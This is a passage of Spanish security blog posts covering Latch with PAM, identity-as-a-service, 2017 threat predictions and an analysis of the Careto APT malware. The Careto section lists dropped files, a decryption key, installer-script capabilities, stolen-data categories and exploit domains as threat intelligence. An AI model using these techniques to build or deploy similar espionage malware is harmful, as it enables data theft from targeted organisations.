Nacional, un CISO Corporativo, departamentos de Seguridad, departamentos de Fraude y muchos más en algunos casos. El segundo caso de uso podemos aplicarlo a la criticada de las plataformas de acceso privilegiado y los distintos roles o capas de seguridad dentro de la organización. > Evitaremos la manipulación o acceso a los sistemas en casos de crisis o problemas de seguridad Podríamos decir que los sistemas PAM y debido al uso que hacen de los usuarios privilegiados en los sistemas, y más específicamente en los críticos, se convierte en uno de los sistemas más importante y de mayor criticidad. Por esta misma criticidad, debemos tener un control más exhaustivo en la seguridad de los mismos. Si tenemos en cuenta la "Multivaluación" de Latch y trabajamos la misma con una cierta lógica externa en las aplicaciones PAM, podríamos cortar los accesos por sistemas críticos, haciendo que en un caso de "ataque" , se bloqueen los accesos a traves de las soluciones Privileged Access Management , que deberían ser el único puno de acceso de los usuarios privilegiados a los sistemas. Pero pensemos en otro caso de uso: - Debido a una vulnerabilidad, ataque , fuga de datos ... podemos hacer que los responsables de seguridad, puedan tomar la decisión de cortar el acceso a los sistemas. Si nuestro CISO o nuestro CSO o nuestro CEO creen oportuno cortar el acceso a los sistemas, pueden hacerlo desde su telefono, en unos segundos posteriores a recibir una llamada de crisis. De la forma tradición, desde que disponemos de la información hasta que se toman las decisiones oportunas, podemos llegar a tener horas en los que estamos expuestos a riesgo. En este caso, podemos llegar a reducir la respuesta ante incidentes hasta incluso 4 veces. Y por último y para no extenderme demasiado, que ya creo que lo he conseguido, os voy a trasladar un caso de uso hiper conocido, "La compartición de las contraseñas". Reducimos drásticamente dichas contraseñas compartidas con el uso en las soluciones PAM del identificador personal, ya que somos mas reticentes a compartir dicho identificador, más aún si está sincronizado con nuestras cuentas como el correo, otros aplicativos o sistemas. Pero la realidad, es que esto solo se cumple cuando hablamos de usuarios que cumplen esta premisa. Si este usuario pertenece a una consultora que adquiere vía RFP la adquisición de servicios, es probable que el identificador y su contraseña, sean distintos a su identificador de empresa y su contraseña en el correo, dándonos una mayor facilidad de "cuentas compartidas". > La premisa del administrador de sistemas/BBDD/Red, es sacar trabajo adelante, pasando "por alto" la seguridad de una cierta forma. Debido a ciertas restricciones de seguridad, se generan o se fomenta que se compartan contraseñas. Se debe implementar la seguridad, teniendo siempre en cuenta la operación de los activos. Debido a esto, tenemos ciertos usuarios que son utilizados por varias personas ya que disponen en algunos casos de un mayor número de accesos a los sistemas o accesos más privilegiados, y es aquí donde y por lo que aplicaremos Latch: - Si forzamos a los usuarios, un bloqueo en Latch tras 5 minutos, sin entrar a hablar de un segundo factor, vamos a reducir drasticamente que se compartan contraseñas, ya que el compartir la Passwd va asociada a Latcheos en inactividad, que se daran muy seguro debido a que es imposible trabajar de una forma continua. Si a esto queremos implementar un TOTP (Segundo Factor basado en tiempo) , Latch podrá ayudarnos, disponiendo de dicha característica incorporada en la aplicación, pero todo eso, nos llevaría otro post. Al final, me he liado, siempre me pasa, creando un post que, a simple vista, es infumable, y del que, o estas muy interesado en el tema o directamente se pasa por alto debido a la extensión, pero en el que os quería contar, alguna de las bondades y beneficios de las soluciones de Privileged Access Management, vitaminadas con una de las soluciones de 11p y cómo la misma se añade como una capa extra de seguridad. --- # Gestión de identidad como servicio (IDaaS - IDentity as a Service) URL: https://ciberseguridad.blog/gestion-de-identidad-como-servicio-idaas-identity-as-a-service/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2016-12-12 Actualizado: 2026-10-04 Tema: Gestion de Identidades y Accesos > Necesidades para la gestión de identidad A medida que los servicios en la nube se están penetrando en varios dominios, Identity as a Service (IDaaS) se convierte en un servicio extremadamente importante para proporcionar y controlar el acceso a diferentes servicios para varios usuarios. Por ello, voy a tratar de enumerar que requiere IDaaS y que se espera de dicha tecnología. ¿Por qué IDaaS? Identity as a Service es de nuevo un servicio basado en la nube y se espera que gestione las credencial ## Necesidades para la gestión de identidad A medida que los servicios en la nube se están penetrando en varios dominios, Identity as a Service (IDaaS) se convierte en un servicio extremadamente importante para proporcionar y controlar el acceso a diferentes servicios para varios usuarios. Por ello, voy a tratar de enumerar que requiere IDaaS y que se espera de dicha tecnología. ## ¿Por qué IDaaS? Identity as a Service es de nuevo un servicio basado en la nube y se espera que gestione las credenciales de varias aplicaciones y para varios usuarios en un solo lugar. Se puede visualizar como una extensión de LDAP. A continuación se enumeran las razones para adoptar IDaaS. [Imagen: Evolución de la Gestión de Identidad] ## Administrar el acceso a las aplicaciones On Premise & Cloud Las empresas o personas utilizan varias aplicaciones, la mayoría de las cuales son servicios basados en la nube, esto toma cada vez más importancia, mientras que algunas de las aplicaciones se alojan on premise. Administrar las credenciales y el acceso a cada uno de esos servicios / aplicaciones se ha vuelto de alguna manera, un poco locura: - La mayoría de los servicios registrados por un individuo tienen la misma contraseña. Cuando la contraseña de un servicio es hackeada, es fácil para el hacker acceder a todos los demás servicios. - Cuando existen contraseñas difieren entre los servicios, resulta difícil recordar todas esas credenciales. La mayoría de nosotros introducimos una contraseña incorrecta al ingresar a un servicio el cual rara vez usamos ¿cierto? Después de dos o tres intentos, el paso inmediato es probar la opción de recordar contraseña. Las contraseñas débiles y compartidas son un problema serio en la industria - Las empresas utilizan aplicaciones que se desarrollan internamente o se alojan en las instalaciones, lo que también aumenta el número de servicios utilizados. Cuando el número de servicios crece, se hace difícil gestionar las credenciales para todos ellos y se convierte así en necesidad el uso de IDaaS. Cuando un empleado deja la organización, entonces se hace difícil revocar o borrar el acceso que se les proporciona. Pero si dispusiesemos de IDaaS como único punto de acceso y gestión de acceso para todos los servicios, la revocación , concesión o baja de acceso a los usuarios se vuelve mucho mas sencilla. ## Single Sign On (SSO) Aunque las contraseñas sean las mismas en todos los servicios, requiere que el usuario se conecte en exclusiva a cada uno de ellos. Considere un ejemplo de acceso a un servicio de Google; El usuario no necesita iniciar sesión en cada uno de los servicios de Google si el usuario ya ha iniciado sesión en cualquiera de ellos previamente. Por ejemplo iniciar sesión en Gmail permite acceder a Drive sin problemas. Cuando tenemos varios servicios de diferentes proveedores de servicios, acceder a cada uno de ellos se vuelve difícil y tedioso. IDaaS no sólo administra las credenciales, sino que también habilita single sign on (SSO) para todos los servicios. También se espera que los usuarios puedan iniciar sesión desde cualquier tipo de cliente - navegadores de escritorio, aplicaciones móviles, APIs, etc. Proporcionar un mecanismo de inicio de sesión unificado para todos los usuarios a través de diferentes clientes , también es abordado por IDaaS. ## Implementando Seguridad al control de acceso extensivo A medida que las empresas utilizan múltiples servicios en la nube, administrar los roles de cada uno de sus empleados es muy tedioso. IDaaS permite a las empresas inscribirse en diferentes servicios y proporcionar acceso a los empleados a través de un solo canal. Los accesos a los servicios varían entre los usuarios , IDaaS permite el control de acceso a niveles muy granulares. Esto a su vez es un refuerzo de la seguridad mejorada. La monitorización de la actividad es otra capacidad del IDaaS que será una ventaja añadida para monitorear las actividades de los usuarios y generar informes. ## Escalabilidad Si consideramos que una empresa tiene 1000 empleados; La suscripción a un servicio nuevo requiere de proporcionar el acceso a los 1000 empleados, esto significa por lo menos el hacer 1000 entradas nuevas y manejar las mismas. Si consideramos otro ejemplo de reclutamiento de 100 empleados más nuevos; Cada uno de ellos puede necesitar el acceso a los servicios en la nube o alojado en on promise. Si tenemos en cuenta que todos los empleados se conectan al servicio de gestión de identidades al mismo tiempo; Es necesaria la escalabilidad para apoyar las solicitudes de todos los empleados con alto rendimiento (HA). Los ejemplos anteriores narran la necesidad de tener un servicio escalable de administración de identidades que proporcione x número de usuarios y número de servicios sin ninguna degradación en el rendimiento. ## Conclusión Aunque IDaaS es muy útil para administrar las credenciales y el acceso a servicios en la nube y en las instalaciones, es necesario que los servicios habiliten la administración de identidades y accesos a través de APIs. Se recomienda evaluar que el proveedor de servicios IDaaS cumple con los requisitos antes mencionados antes de suscribirse a ellos. Es posible que existan algunas características más a las anteriores, proporcionadas por los proveedores de IDaaS, pero a muy grandes rasgos, las anteriores podrían ser consideradas obligatorias. --- # Predicciones Ciberseguridad 2017 URL: https://ciberseguridad.blog/predicciones-ciberseguridad-2017/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2016-12-11 Actualizado: 2026-09-29 Tema: Vulnerabilidades y Ataques Informaticos > Vulnerabilidad en WordPress, ransomware, compromiso de correo electrónico empresarial, ataques DDoS y las acusaciones de hackeo en las elecciones presidenciales de Estado Unidos, el 2016 ha sido un duro año en ciberseguridad , y todavía no ha terminado. No hay razón para creer que el 2017 será mejor. En todo caso, podría ser aún peor a medida que los ciberdelincuentes continúan impulsando la ingeniería social, encuentran nuevas maneras de enviar malware, entrar en bases de datos vulnerables y Vulnerabilidad en WordPress, ransomware, compromiso de correo electrónico empresarial, ataques DDoS y las acusaciones de hackeo en las elecciones presidenciales de Estado Unidos, el 2016 ha sido un duro año en ciberseguridad , y todavía no ha terminado. No hay razón para creer que el 2017 será mejor. En todo caso, podría ser aún peor a medida que los ciberdelincuentes continúan impulsando la ingeniería social, encuentran nuevas maneras de enviar malware, entrar en bases de datos vulnerables y aprovechar la tecnología móvil para encontrar maneras de entrar dentro de las defensas corporativas y los objetivos personales. ## 1. Las contraseñas "crecen" El reciente ataque DDoS que causó estragos en una gran parte de Internet el 21 de octubre fue al menos parcialmente iniciado debido a contraseñas predeterminadas sin cambios en los dispositivos IoT. ¿Cuántos de sus usuarios tienen contraseñas simples, comunes o obsoletas? En 2017, los mejores servicios de gestión de contraseñas ganarán fuerza a medida que las empresas comprendan lo vulnerables que son. Los profesionales de la ciberseguridad lucharán para proteger sus infraestructuras crítica, los sistemas conectados y los sistemas y dispositivos de acceso remoto, mientras que la práctica de contraseña débiles siguen siendo la norma. > La mitigación de las amenazas internas también se puede lograr a través de una mejor administración de las contraseñas. La mejor manera de hacerlo es implementar una solución que almacene de forma segura las contraseñas , principalmente las desconocidas para los usuarios y, a continuación, que sean capaces de validar y rotar periódicamente esas contraseñas para garantizar la seguridad. En otro post os hablare de las soluciones PAM (Privileged Access Management) , como CyberArk. En un mundo ideal, un usuario nunca sabría realmente ciertos usos de su contraseña , que seria rotada y cambiada cada semana. Nunca sabríamos la pasword del usuario root , por ejemplo, y ademas, la rotariamos y seria distinta cada uso o cierto tiempo definido. ## 2. El privilegio gana poder Los piratas informáticos quieren un acceso de alto nivel, que obtienen a través de las credenciales de los usuarios privilegiados como los profesionales de TI, directores generales o proveedores, por ejemplo. Y aunque las organizaciones han aplicado seguridad a los sistemas, aplicaciones y datos más críticos para su negocio, estas medidas preventivas simplemente ya no son suficientes. En 2017, será el año en el que las organizaciones inteligentes finalmente se ponen serias en proteger no sólo a los sistemas, sino también a los usuarios privilegiados, identificándolos, supervisando su acceso y cerrando el acceso a lo que no necesitan, intentando seguir la norma del mínimo privilegio. También se abordará este tema en las organizaciones que estén dispuestas a proporcionar una amplia educación y capacitación sobre los peligros potenciales, especialmente en una fuerza de trabajo cada vez más móvil, donde muchas personas prefieren sacrificar la privacidad y los datos personales para acceder y creen que su seguridad será atendida por los proveedores de servicios de terceros y creadores de aplicaciones. En las últimas generaciones de nativos digitales, la gente está más que dispuesta a renunciar a su información personal y los datos para facilitar el acceso a las aplicaciones, la conectividad, y dicha información puede ser fácilmente explotada.Están dispuestos a confiar en que estos desarrolladores de aplicaciones , estos proveedores, se asegurarán de que su información y accesos están a buen recaudo. > Si combinamos las brechas en ciberseguridad, la escasez de talento, la fuerza de trabajo móvil, entornos centrados en la aplicación y hacking cada vez más sofisticados, obtenemos una tormenta perfecta. ## 3. El juego de la culpa de seguridad se calentará Una tendencia que estamos viendo y que es realmente horrible es que ni siquiera se dice si un ataque ocurre , o cuando ocurre. El Internet de las cosas y la creciente dependencia de los proveedores de soluciones de seguridad, significa que las empresas no pueden fácilmente tener en cuenta la propiedad o el origen una vez ocurre una violación de seguridad. ¿Quién es responsable de asegurar, mantener y reparar las diversas tecnologías? ¿se ha conectado un producto a sistemas internos que todavía no se pueden parchear? Actualmente y muy a menudo se pasa por alto un número de dispositivos IoT porque caen fuera del alcance tradicional de IT, pero ahora mas que nunca,eso significa exposición a amenazas. Con la integración de los sistemas del Internet de las cosas, la automatización y la cloud, nadie parece estar completamente seguro de quién es realmente responsable de mantener la seguridad de todas estas piezas: el fabricante de dispositivos IoT, el proveedor de servicios de seguridad, el departamento de TI interno, los usuarios individuales ¿Quién?. > Cuando ocurre una violación, incluso en empresas con distintas capas de seguridad, la cuestión de quién posee la responsabilidad o quién debe o tiene poder para hacer algo al respecto creará reacciones tensas y momentos de apuntar con el dedo. Las compañías pueden evitar este juego de culpa asegurando la comunicación abierta entre la dirección de TI y de negocio para entender las amenazas potenciales, las opciones para la seguridad y los desafíos y las restricciones que existen dentro de la organización. ## 4. Ransomware se saldrá fuera de control Desde el 1 de enero de 2016 el grupo de respuesta de seguridad de Symantec ha visto un promedio de más de 4.000 ataques ransomware por día: un aumento del 300 por ciento respecto de 2015, según su Informe sobre Amenazas. > La mayoría de las organizaciones se basan en técnicas de prevención de bajo costo, como firewall y soluciones antivirus o prevención de intrusiones para mitigar amenazas como estas. Sin embargo, estas herramientas son insuficientes y los datos de infracción muestran que la detección y la respuesta a incidentes deben mejorarse. Y a medida que los atacantes siguen utilizando la ingeniería social y las redes sociales para dirigirse a roles o individuos sensibles dentro de una organización , la necesidad de una educación en seguridad integral se vuelve crítica. Algunos atacantes pueden residir en los entornos de una empresa durante meses, a menudo moviéndose lateralmente dentro de los entornos y los silos de red , los puntos finales , los sistemas y los procesos de la seguridad de datos , quienes pueden restringir la capacidad de una organización de prevenir, detectar y responder a ataques avanzados. Por último, las nuevas superficies de ataque -por ejemplo, IaaS, SaaS y IoT- siguen siendo tan nuevas que las organizaciones aún no han descubierto la mejor manera de asegurarlas. ## 5. Los tiempos de espera no verán mejoras significativas > El tiempo de espera, o el intervalo entre un ataque exitoso y su descubrimiento por la víctima, verá cero mejoras significativas en 2017. En algunos casos extremos, los tiempos de respuesta pueden llegar a ser tan alto como dos años y puede costar a una empresa millones por incumplimiento de normativas. ¿Por qué tanto tiempo? hay poco o ningún enfoque en la detección de la actividad de ataques. Al advenimiento de la "era de malware", la industria creció rápidamente para centrarse en dos temas básicos: La defensa en profundidad, que se considero como tácticas de prevención de capas en línea para hacer más difícil la penetración desde el exterior, y la identificación de malware, que se ha manifestado como una carrera armamentista hacia la identificación 100% fiable de malware. Si bien las tecnologías de respuesta y las capacidades de remediación mejoradas, las víctimas fueron capaces de aislar y reparar los daños muy rápidamente. El problema es que estas tecnologías no ayudaron a reducir el tiempo de permanencia de los ataques a menos que los equipos de respuesta tropiezan con algo malicioso o descubran al azar una anomalía. Hoy en día, los profesionales de seguridad están usando los archivos de registro de dispositivos de red para buscar pistas sobre si se ha intentado atacar o ha tenido éxito el ataque, pero almacenar y clasificar las enormes cantidades de datos necesarios para este enfoque es costoso e ineficiente. La necesidad de grandes almacenes de datos y motores de análisis masivos impulsó la nueva industria de la información y la gestión de eventos (SIEM). Si bien un SIEM es una gran herramienta forense después de los hechos para los investigadores, todavía no es eficaz en la identificación de ataques en curso. Lo que algunas compañías están haciendo ahora es desarrollar productos que se centran en analizar el tráfico de red en bruto para identificar los indicadores de ataque y encontrar atacantes tan pronto como sea posible después de haber intentado o conseguido los mismos. Esto nos reducirá drásticamente el tiempo de permanencia de los ataques y nuestra exposición a los mismos. ## 6. Los móviles continuará subiendo como punto de entrada > Al menos una, si no más, grandes infracciones de las empresas se atribuirá a los dispositivos móviles en 2017. Un informe del Instituto Ponemon encontró que para una empresa, el riesgo económico de las violaciones de datos móviles puede ser tan alto como 26.4 millones de dólares y el 67 por ciento de las organizaciones encuestadas reportaron haber tenido una fuga de datos como resultado de los empleados que utilizan sus dispositivos móviles para acceder a la la información confidencial y datos sensibles de la empresa. > Las personas y sus dispositivos móviles están ahora en continuo movimiento, y de una forma muy rápida, para que las antiguas estrategias de seguridad sean eficaces. Muchos usuarios sienten que pueden proteger su privacidad mientras tienen un acceso seguro e ininterrumpido a los servicios empresariales y personales .Todavía muchas personas se suscriben a la opinión que no son ellos los que son responsables de las infracciones de seguridad. Sus CIOs y CEOs ven esto como un desafío complejo para la implementación de sus estrategias de seguridad de la empresa, y que no solo se resuelve por tener los datos de correo electrónico y entregarlos a través de SSL a un solo sistema operativo. Los pagos móviles también se convertirán en un pasivo. > Las personas deben entender que necesitan tratar sus datos biométricos tan cuidadosamente como lo hacen otros datos financieros y personales. Una vez más, todo se reduce a la educación y la formación en seguridad. ¿No sería bueno que los proveedores públicos de acceso Wi-Fi tuvieran que presentar la problemática en seguridad y mostrar advertencias como los paquetes de cigarrillos? Algo así como" Advertencia: esta conexión de acceso público no es segura y la información que envía y recibe mientras está conectada pueden ser vistos, recolectados y utilizados posteriormente por delincuentes para robar sus bienes, identidad o información privada. ## 7. El Internet de las amenazas. Vulnerabilidades y ataques en el Internet de las cosas aumentarán y aumentarán la necesidad de estandarización de varias medidas de seguridad. Por supuesto, en Octubre de 2016 los ataque DDoS en los principales sitios web globales, incluyendo Twitter, Netflix, Reddit y sitios del gobierno británico, han puesto foco en dicha importancia para este 2017. La realidad es que un dispositivo conectado no lo convierte en un dispositivo inteligente. Las 'cosas' se están conectando y olvidando, como fueron los routers utilizados en la botnet Mirai. Esto conduce a una mentalidad de ignorar estos dispositivos "tonto" sin prestar atención al hecho de que estos dispositivos, aunque intrínsecamente 'mudos', están conectados a la mayor línea partidaria jamás hecha: Internet. Esto no es sólo un problema para los dispositivos de menor consumo, o incluso para hogares conectados y coches. Lo que es más preocupante es la posibilidad de un ataque a grandes y extensos sistemas de infraestructura como la red eléctrica, o incluso aviónica o sistemas ferroviarios. No debemos estar preocupados por cosas como, si mi ducha conectada se enciende en caliente o en frío.Creo que hay una oportunidad bastante significativa de que veamos un hack importante en las redes eléctricas o en sistemas de transporte como el ferrocarril en 2017. Debemos preocuparnos por la tecnología de los años 50 y 60 que está alimentando estos sistemas de infraestructuras críticas. > El público en general no tiende a ver a estos sistemas como similares a los dispositivos IoT que utilizan cada vez con mayor frecuencia. Los teléfonos inteligentes son el dispositivo de Internet más abundante. El próximo hiper-salto en escala. Todos los dispositivos y / o conexiones pueden verse comprometidos, acortar el tiempo de respuesta y asegurar IoT depende de saber cuándo ocurre una amenaza de la forma más rápida posible y con el mayor nivel de confianza. --- # Malware Careto , un APT con origen en España URL: https://ciberseguridad.blog/apt-caretomalware-careto-un-apt-con-origen-en-espana/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2016-12-10 Actualizado: 2026-10-04 Tema: Vulnerabilidades y Ataques Informaticos > Careto [https://es.wikipedia.org/wiki/Careto_(malware)] es un conjunto de troyanos de reconocimiento y robo de datos que pueden monitorizar muchos aspectos de la operación de un sistema, incluida la entrada de teclas y el tráfico de la red. Esta información se almacena localmente en el sistema infectado junto con información extensa de configuración del sistema. Los troyanos son capaces de cargar esta información recolectada en un servidor externo donde puede ser recuperada por el atacante. El m Careto es un conjunto de troyanos de reconocimiento y robo de datos que pueden monitorizar muchos aspectos de la operación de un sistema, incluida la entrada de teclas y el tráfico de la red. Esta información se almacena localmente en el sistema infectado junto con información extensa de configuración del sistema. Los troyanos son capaces de cargar esta información recolectada en un servidor externo donde puede ser recuperada por el atacante. El malware, utilizado en el Careto es extremadamente modular en su diseño, y en lugar de utilizar un programa de gran tamaño, utiliza muchos módulos más pequeños, en el que cada uno desempeña una función particular. También utiliza una instalación en varias etapas que implica diferentes pasos intermedios. Poco despue de ser descubierto publicamente, se descubrieron dos variaciones distintas de este malware. El primero, conocido como "SGH", utiliza un componente de interceptación de datos y un rootkit en modo kernel, así como componentes de modo de usuario para acceder a los datos capturados y cargarlos en el servidor externo. La segunda variación que se llama "Careto" funciona completamente en modo de usuario y es totalmente compatible con los sistemas operativos Windows 2000 y superiores de 32 y 64 bits . Con la información que se recogio de fechas y horas de las muestras de los componentes del instalador, se determinó que este ataque podía haber estado activo desde el año 2007. Sin embargo, en las muestras de los principales componentes activos, hace indicar que todo parece venir desde finales de 2012 hasta mediados de 2013. Curiosamente, los componentes de desinstalación utilizados para eliminar el malware de los sistemas infectados están fechados el 20 de junio de 2013, siendo esta la última fecha conocida en las muestras, como posible fecha en la que los atacantes comenzaron a eliminar su malware de los equipos infectados. La mayoría de las muestras no contenían información de localización que pudiera indicar el origen del malware. Sin embargo, algunas de las muestras posteriores contenían información de la página de códigos que indicaba un origen europeo occidental. El valor hexadecimal de 0x4E4 se traduce en el valor decimal 1252 y esta es la página de códigos utilizada por Microsoft Windows para productos que utilizan el alfabeto latino de Europa occidental, lo que hace creer que Careto, fue de origen Español. [Imagen: Código 0x4E4 en Malware Careto] Los principales objetivos de Careto se dividen en varias categorías: - Instituciones gubernamentales - Diplomáticos / embajadas - Energía, petróleo y gas - Empresas privadas - Instituciones de investigación - Empresas de capital privado - Activistas Poco despues del ataque, ya se habian observado más de 380 víctimas únicas en 31 países distintos. Lo que hace especial a "Careto" es la complejidad del conjunto de herramientas utilizado por los atacantes. Esto incluye un malware extremadamente sofisticado, un rootkit, un bootkit y versiones de Windows de 32 y 64 bits, como hemos visto antes, pero no solo estas, si no que tiene versiones de Mac OS X y Linux y posiblemente versiones para Android y iPad / iPhone (Apple iOS). Careto también utiliza un ataque personalizado contra versiones anteriores de los productos antivirus para esconderse en el sistema, poniéndolos por encima de Duqu en términos de sofisticación, convirtiéndolo en una de las amenazas más avanzadas en este momento. Este y varios otros factores nos hacen creer que esta podría ser una campaña patrocinada por ¿España? , luego veremos el motivo de decir que es Español, ademas de por el código del alfabeto. Cuando está activo en un sistema de víctimas, Careto puede interceptar el tráfico de red, las teclas (Keylogger), las conversaciones de Skype, las claves de PGP, analizar el tráfico WiFi, buscar toda la información de los dispositivos Nokia (En la actualidad, estos ataques los dirigen contra Android o iOS), capturar pantallas y supervisar todas las operaciones de archivos. El malware recopila una gran lista de documentos del sistema infectado, incluidas claves de cifrado, configuraciones de VPN, claves SSH y archivos RDP (Escritorio remoto) y otras extensiones que podrían estar relacionadas con herramientas de cifrado de nivel militar / gubernamental personalizadas. En función de los "exploit" encontrados en el código, los autores de la máscara parecen hablar español. ## Análisis del malware Careto El malware involucrado en este ataque parece dividirse en dos grupos separados: - Careto - SGH Ambas familias son extremadamente modulares en su diseño, lo que permite un mantenimiento y una actualización muy simple, ya que solo se requieren pequeños componentes en lugar de un único archivo grande. La campaña Careto descubierta, se basa en correos electrónicos de spear-phishing con enlaces a sitios web malicioso. El sitio web malicioso contiene una serie de exploits diseñados para infectar al visitante. Tras una infección exitosa, el sitio web malicioso redirige al usuario a un sitio web benigno, que puede ser, desde una película de Youtube a un portal de noticias. Alguno de los sitios web en los realizaban el ataque, son: - linkconf.net - redirserver.net - swupdt.com Es importante tener en cuenta que los sitios web de exploits no infectan automáticamente a los visitantes, si no que en su lugar, los atacantes alojan los exploits en carpetas específicas en el sitio web, que no se referencian o enlazan directamente en ninguna parte, excepto en correos electrónicos maliciosos. En ocasiones, los atacantes usan subdominios en los sitios web de exploits para que parezcan verdaderos. Por ejemplo, se han observado los siguientes subdominios: sitio de explotación "linkconf.net": - negocios.iprofesional.linkconf.net - internacional.elpais.linkconf.net - politica.elpais.linkconf.net - cultura.elpais.linkconf.net - economia.elpais.linkconf.net - test.linkconf.net - soc.linkconf.net - sociedad.elpais.linkconf.net - world.time.linkconf.net - internacional.elpais.linkconf.net - elpais.linkconf.net - elespectador.linkconf.net - blogs.independent.linkconf.net - elmundo.linkconf.net - guardian.linkconf.net - washingtonsblog.linkconf.net - publico.linkconf.net ### Primera variante del malware - “SGH” La primera variante, conocida como "SGH", utiliza un componente de interceptación de datos y un rootkit en modo kernel, así como componentes en modo de usuario para acceder a los datos capturados y cargarlos en el servidor externo. Cuando se ejecuta, coloca los siguientes archivos en la carpeta% SYSTEM% : - mfcn30.dll - jpeg1x32.dll - vchw9x.dll - awcodc32.dll - awdcxc32.dll - scismap.sys - bootfont.bin Y el archivo ___ A6.tmp |nombre de archivo aleatorio| se coloca en la carpeta% TEMP%. El controlador descartado scsimap.sys se instalará y ejecutará para instalar componentes adicionales a nivel de kernel. Tan pronto como el componente de instalación comience a ejecutarse, intentará deshabilitar el controlador de seguridad de productos antivirus para evitar que analice cualquier proceso denominado "services.exe". Luego ubicará la sección ".inf" dentro y la descifrará con RC4 usando una clave codificada MD5 ("AQA4$w1QsfexDT") seguido de una operación de "inflado". El resultado del descifrado contiene un script de instalación que interpreta y realiza instrucciones específicas basadas en las entradas proporcionadas en el script, con tareas como: 1. Instala un archivo. 2. Descarga un archivo de una URL determinada (http, https, ftp o gopher) e instála. El archivo está instalado en un directorio específico. 3. Establece el valor de la "marca de tiempo" del archivo instalado en el kernel32.dll local para no despertar sospechas. 4. Eliminar un archivo 5. Establecer un valor de registro 6. Eliminar una clave de registro o valor. 7. Copiar datos de un valor de registro a otro 8. Comparar datos de un valor de registro con otro 9. Crea un nuevo servicio 10. Eliminar un servicio 11. Arrancar un servicio 12. Detener un servicio 13. No hacer nada (Curioso) 14. Crea un nuevo proceso 15. Mostrar un cuadro de mensaje 16. Anexar datos a un valor de registro 17. Agregar un nuevo filtro de dispositivo usando las API de SetupiD * Windows 18. Eliminar un filtro de dispositivo con las API de SetupiD * Windows 19. Agregar un nuevo certificado al almacén de certificados local 20. Eliminar un certificado existente del almacén de certificados local 21. Hacer nada (Curioso) 22. Detecta máquinas virtuales VMware y Virtual PC y salir si no las encuentra 23. Detectar máquinas virtuales y salir si se encuentra. 24. Escribir código en el archivo bootmgr 25. Volcar datos a un archivo temporal con el prefijo ( ____ ) y comenzar como un nuevo proceso. El siguiente diagrama muestra la relación de cada componente: [Imagen: relacion variante SGH Malware Careto] #### Información que extrae el malware "SGH" Como hemos comentado anter, tanto SGH como Careto, obtenian una gran cantidad de información: - Sistema Operativo 1. Versión del sistema operativo (Win98, WinNT, WinXP, etc.) 2. Nombre del propietario 3. Nombre de la organización registrada 4. Lista de hotfixes instalados 5. información del país 6. Fechas de instalación del sistema operativo 7. Diseño e idioma del teclado 8. Zona horaria - Cuentas de usuarios locales 1. Nombre del usuario local 2. Tipo de usuario 3. Privilegios asignados al usuario 4. Comentario asignado al usuario - Memoria del sistema 1. (Total / Gratis) Memoria física 2. (Total / Gratis) Memoria Virtual 3. Tamaño del archivo de paginación 4. Tamaño de página 5. Dirección de solicitud mínima - Información del FileSystem 1. Etiqueta de unidad 2. Tipo (fijo, extraíble, etc.) 3. (Total / Gratis) Memoria disponible 4. Letra de Root Drive 5. Compatibilidad con Drive Object ID 6. Soporte de puntos de repetición 7. Compatibilidad con archivos dispersos 8. File Volume Quote 9. Número de serie del Volumen 10. Estado de las propiedades de la unidad: a) FS_CASE_IS_PRESERVED b) FS_CASE_SENSITIVE c) FS_FILE_COMPRESSION d) FS_FILE_ENCRYPTION e) FS_PERSISTENT_ACLS f) FS_UNICODE_STORED_ON_DISK g) FS_VOL_IS_COMPRESSED 11. Estado del flag FS_CASE_IS_PRESERVED - Información de unidades USB 1. Nombre del USB conectado previamente al dispositivo - Procesos corriendo en el sistema 1. Nombre del proceso 2. PID 3. Memoria total utilizada - Software instalado en el sistema 1. Nombre del software 2. Versión instalada - Información de red 1. Dirección MAC 2. Estado de la tarjeta de red encendido / apagado 3. Dirección IP 4. Servidor DHCP 5. Dirección de Loopback 6. Tipo: a) SLIP b) PP c) FDDI d) Ethernet e) Token Rings 7. Información de la tarjeta de red a) Nombre del Servicio b) Descripción c) Título 8. Descripción del controlador de la tarjeta de red 9. Conexiones TCP / UDP activas a) Dirección de destino b) Puertos c) Estado (Cerrado, Escuchando,etc.) #### Segunda variante del malware - “Careto” La segunda variante, llamada "Careto", funciona completamente en modo de usuario y es totalmente compatible con los sistemas operativos Windows de 32 bits y 64 bits posteriores a 2000. [Imagen: relacion variante malware careto] El ataque usa dos paquetes de software y varias utilidades relacionadas. Los principales paquetes de software se llaman "Careto" y "SGH". El paquete "back door" llamado "Careto" es una puerta trasera de uso general que consta de componentes de nivel usuario. Recopila información del sistema y ejecuta código arbitrario proporcionado por la infraestructura de command and control. El paquete back door llamado "SGH" es más avanzado y funciona principalmente en modo kernel. Contiene componentes de rootkit y módulos de interceptor para eventos de sistema y operaciones de archivos. Roba archivos y mantiene su propia conexión con los servidores de command and control. Además de "Careto" y "SGH", se observó el uso de un back door compilado de forma personalizada basado en el clon de código abierto "netcat" llamado "sbd". Este clon "sbd" se ha observado en variantes para Win32, Mac OS X y Linux. Durante la investigación, se pudo obtener las versiones Win32 y Mac OS X, pero la variante de Linux estaba muy dañada y no se pudo recuperar correctamente. Si bien Careto y SGH también pueden funcionar de forma "independiente", se observó que el command and control, instaló un paquete utilizando el otro; por ejemplo, una víctima infectada con Careto también recibiría la variante de malware SGH. Los archivos de los paquetes back door utilizados por Careto, se firman utilizando el mismo certificado, el cual pertenece a una empresa búlgara (¿falsa?) llamada "TecSystem Ltd.". [Imagen: Certificado Malware Careto] #### Información que extrae el malware "Careto" [Vídeo](https://www.youtube.com/watch?v=bEenclp8Y-I) Como bien hemos comentado, tanto Careto como SGH , se autocomplementaban el uno al otro, siendo capaces de funcionar por separado, pero con la caracteristica de poderse instalar mutuamente. Careto fue la evolución del malware en su segunta vertiente, por ello, se desarrollo para la búsqueda de información más concreta, como podemos obsebar en esta lista de información que era capaz de obtener: - Información de Inernet Explorer 1. Lista de autocompletar, historial, cookies - Información sobre Software 1. La misma información que jpeg1x32.dll 2. Tiempo de actividad del sistema 3. Usuario actual 4. Directorio de Windows 5. Directorio del sistema 6. Variables de entorno - Información sobre Hardware 1. La misma información que jpeg1x32.dll 2. Lista de dispositivos PCI 3. Lista de impresoras - Información sobre Conexiones de Red 1. La misma información que jpeg1x32.dll 2. Conexiones activas 3. Configuración de IE Proxy 4. Estadísticas de protocolo - Snapshot 1. Lista de todos los procesos corriendo en la máquina - Credenciales privadas 1. Credenciales de MSN Messenger (Lo enlazo por 